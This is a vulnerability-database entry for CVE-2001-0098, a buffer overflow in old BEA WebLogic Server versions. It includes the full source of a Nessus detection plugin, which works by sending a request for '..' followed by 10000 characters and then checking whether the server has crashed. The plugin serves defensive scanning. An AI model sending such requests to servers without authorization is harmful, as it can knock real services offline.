Vulnerabilities > CVE-2001-0098 - Buffer Overflow vulnerability in BEA Weblogic Server 4.5.2

CVSS 10.0 - CRITICAL
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
COMPLETE
Integrity impact
COMPLETE
Availability impact
COMPLETE
network
low complexity
bea
critical
nessus
exploit available

Summary

Buffer overflow in Bea WebLogic Server before 5.1.0 allows remote attackers to execute arbitrary commands via a long URL that begins with a ".." string.

Vulnerable Configurations

Part Description Count
Application
Bea
1

Exploit-Db

description: BEA Systems Weblogic Server 4.0 x/4.5 x/5.1 x Double Dot Buffer Overflow. CVE-2001-0098. Remote exploits for multiple platforms
id: EDB-ID:20516
last seen: 2016-02-02
modified: 2000-12-19
published: 2000-12-19
reporter: peter.grundl
source: https://www.exploit-db.com/download/20516/
title: BEA Systems Weblogic Server 4.0 x/4.5 x/5.1 x Double Dot Buffer Overflow

Nessus

NASL family: Web Servers
NASL id: WEBLOGIC_DOTDOTDOS.NASL
description: Requesting an overly long URL starting with a double dot can crash certain versions of WebLogic servers or possibly even allow for arbitrary code execution.
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 10697
published: 2001-06-21
reporter: This script is Copyright (C) 2001-2018 StrongHoldNet
source: https://www.tenable.com/plugins/nessus/10697
title: WebLogic Server Double Dot GET Request Remote Overflow
code
#
# This script was written by Vincent Renardias <[email protected]>
#
# Licence : GPL v2
#

# Changes by Tenable:
# - Revised plugin title (4/13/2009)
# - Added cpe, updated copyright (8/15/2012)
# - Switched to the weblogic detect script, updated copyright (11/23/2015)

include("compat.inc");

#
# Plugin metadata. Every attribute value below is part of the plugin's
# registered description and is reproduced verbatim.
#
if (description)
{
  script_id(10697);
  script_version ("1.34");
  script_cve_id("CVE-2001-0098");
  script_bugtraq_id(2138);

  script_name(english:"WebLogic Server Double Dot GET Request Remote Overflow");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server is vulnerable to a buffer overflow attack." );
  script_set_attribute(attribute:"description", value:
"Requesting an overly long URL starting with a double dot can crash
certain versions of WebLogic servers or possibly even allow for
arbitrary code execution." );
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Dec/382");
  script_set_attribute(attribute:"solution", value:
"Upgrade to WebLogic 5.1 with Service Pack 7 or later." );
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"plugin_publication_date", value: "2001/06/21");
  script_set_attribute(attribute:"vuln_publication_date", value: "2000/12/19");
  script_set_attribute(attribute:"plugin_modification_date", value:"2020/06/12");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe",value:"cpe:/a:oracle:weblogic_server");
  script_end_attributes();

  script_summary(english:"WebLogic Server DoS");
  # ACT_DENIAL: the scanner is told up front that this check may take
  # the target service down, so it is only scheduled when such checks
  # are enabled.
  script_category(ACT_DENIAL);
  script_copyright(english:"This script is Copyright (C) 2001-2020 StrongHoldNet");
  script_family(english:"Web Servers");
  script_dependencies("weblogic_detect.nasl");
  script_require_ports("Services/www", 80, 7001);
  script_require_keys("www/weblogic");
  exit(0);
}

#
# Detection. This is an active crash test, not a version comparison:
# the plugin sends the overlong request and then observes whether the
# server is still answering.
#

include("http_func.inc");
include("misc_func.inc");

# Only run against hosts that weblogic_detect.nasl has already flagged;
# the KB lookups exit silently when the keys are absent.
get_kb_item_or_exit("www/weblogic");
port = get_http_port(default:80, embedded:TRUE);
get_kb_item_or_exit("www/weblogic/" + port + "/installed");

# Re-confirm the product from the HTTP banner before sending anything
# that could disrupt the service.
banner = get_http_banner(port:port);
if (!banner || "WebLogic" >!< banner) exit(0);

# Guard clauses: a closed port or an already unresponsive server is not
# a finding (and a pre-existing outage must not be attributed to us).
if (!get_port_state(port)) exit(0);
if (http_is_dead(port:port)) exit(0);

sock = http_open_socket(port);
if (!sock) exit(0);

# Build a GET for ".." followed by 10000 filler characters. The reply
# body is drained but never inspected; only the server's liveness
# afterwards matters.
req = http_get(item:string("..", crap(10000)), port:port);
send(socket:sock, data:req);
http_recv(socket:sock);
http_close_socket(sock);

# Report a hole only if the server stopped responding after the
# request. retry: 2 presumably re-probes before declaring it dead,
# which limits false positives from a single slow reply.
if (http_is_dead(port:port, retry: 2)) security_hole(port);